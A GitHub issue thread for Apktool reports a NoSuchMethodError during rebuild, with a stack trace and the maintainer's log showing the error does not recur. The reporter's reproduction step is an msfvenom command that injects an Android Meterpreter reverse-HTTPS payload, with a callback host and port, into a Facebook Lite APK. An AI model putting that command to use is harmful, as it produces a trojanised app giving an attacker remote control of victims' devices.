### ISSUE TITLE
ERROR:  java.lang.NoSuchMethodError: brut.androlib.meta.StringExConstructor.constructScalar

### ISSUE THREAD

**Issue by vilesis** [iBotPeaches/Apktool#2047]
### Information
1. **Apktool Version (`apktool -version`)** - 2.4.0
2. **Operating System (Mac, Linux, Windows)** - Linux ` Linux  4.4.0-142 generic`

3. **APK From? (Playstore, ROM, Other)** - uptodown.com

### Stacktrace/Logcat

```
[-] I: Using Apktool 2.4.0

Exception in thread "main" java.lang.NoSuchMethodError: brut.androlib.meta.StringExConstructor.constructScalar(Lorg/yaml/snakeyaml/nodes/ScalarNode;)Ljava/lang/Object;
        at brut.androlib.meta.StringExConstructor.access$100(StringExConstructor.java:25)
        at brut.androlib.meta.StringExConstructor$ConstructStringEx.construct(StringExConstructor.java:32)
        at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:204)
        at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:193)
        at org.yaml.snakeyaml.constructor.SafeConstructor.processDuplicateKeys(SafeConstructor.java:85)
        at org.yaml.snakeyaml.constructor.SafeConstructor.flattenMapping(SafeConstructor.java:70)
        at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:190)
        at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:149)
        at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:309)
        at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:204)
        at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:193)
        at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:159)
        at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:146)
        at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:524)
        at org.yaml.snakeyaml.Yaml.loadAs(Yaml.java:518)
        at brut.androlib.meta.MetaInfo.load(MetaInfo.java:70)
        at brut.androlib.Androlib.readMetaFile(Androlib.java:262)
        at brut.androlib.Androlib.build(Androlib.java:276)
        at brut.androlib.Androlib.build(Androlib.java:269)
        at brut.apktool.Main.cmdBuild(Main.java:247)
        at brut.apktool.Main.main(Main.java:79)

```

### Steps to Reproduce
1. `msfvenom -x facebook-lite-138-0-0-15-99.apk -p android/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=4444 -o output.apk`

### Frameworks
None for add.

### APK
If 
[facebook-lite-138-0-0-15-99.zip](https://github.com/iBotPeaches/Apktool/files/3000948/facebook-lite-138-0-0-15-99.zip)

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? yeap
2. If you are trying to install a modified apk, did you resign it? 
3. Are you using the latest apktool version? yeap

**Comment by xiangtianyu** [comment]
I've met the same problem. Did your ever find the solution?

**Comment by iBotPeaches** [comment]
Sorry for delay.

```
➜  2047 apktool d facebook-lite-138-0-0-15-99.apk 
I: Using Apktool 2.4.2-f545c2-SNAPSHOT on facebook-lite-138-0-0-15-99.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/ibotpeaches/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
➜  2047
➜  2047 apktool b facebook-lite-138-0-0-15-99 --use-aapt2
I: Using Apktool 2.4.2-f545c2-SNAPSHOT
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
➜  2047 
```

Can't replicate with soon to be released (v2.5.0) and aapt2.
